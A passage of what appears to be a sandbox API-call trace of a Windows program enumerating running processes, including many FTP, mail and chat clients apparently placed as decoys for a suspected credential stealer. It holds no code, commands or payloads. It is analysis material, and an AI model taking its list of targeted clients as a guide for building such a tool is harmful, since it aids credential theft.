th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0253.111] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0253.112] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0253.114] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0253.115] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0253.117] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0253.123] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0253.125] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0253.127] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0253.129] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0253.131] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0253.133] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0253.151] CloseHandle (hObject=0x1d14) returned 1 [0253.152] Sleep (dwMilliseconds=0x64) [0253.357] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0253.367] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.369] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0253.374] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0253.375] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0253.377] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0253.378] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0253.379] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0253.381] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0253.382] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0253.384] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.385] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.386] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0253.391] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.392] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.393] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.395] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.396] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.398] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.399] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.401] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0253.452] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0253.453] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0253.455] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.456] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0253.458] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0253.459] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0253.461] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0253.462] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0253.466] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.468] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0253.469] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0253.471] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0253.472] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0253.474] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0253.475] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0253.477] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0253.478] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0253.483] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0253.484] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0253.486] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0253.487] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0253.489] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0253.490] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0253.491] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0253.493] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0253.494] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0253.504] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0253.506] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0253.507] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0253.509] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0253.513] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0253.515] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0253.516] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0253.518] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0253.519] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0253.521] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0253.522] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0253.523] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0253.525] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0253.530] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0253.531] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0253.533] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0253.535] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0253.537] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0253.538] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0253.540] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0253.594] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0253.596] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0253.598] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0253.600] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0253.601] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0253.603] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0253.605] Process32Next (in: hSnapshot=0x1018, 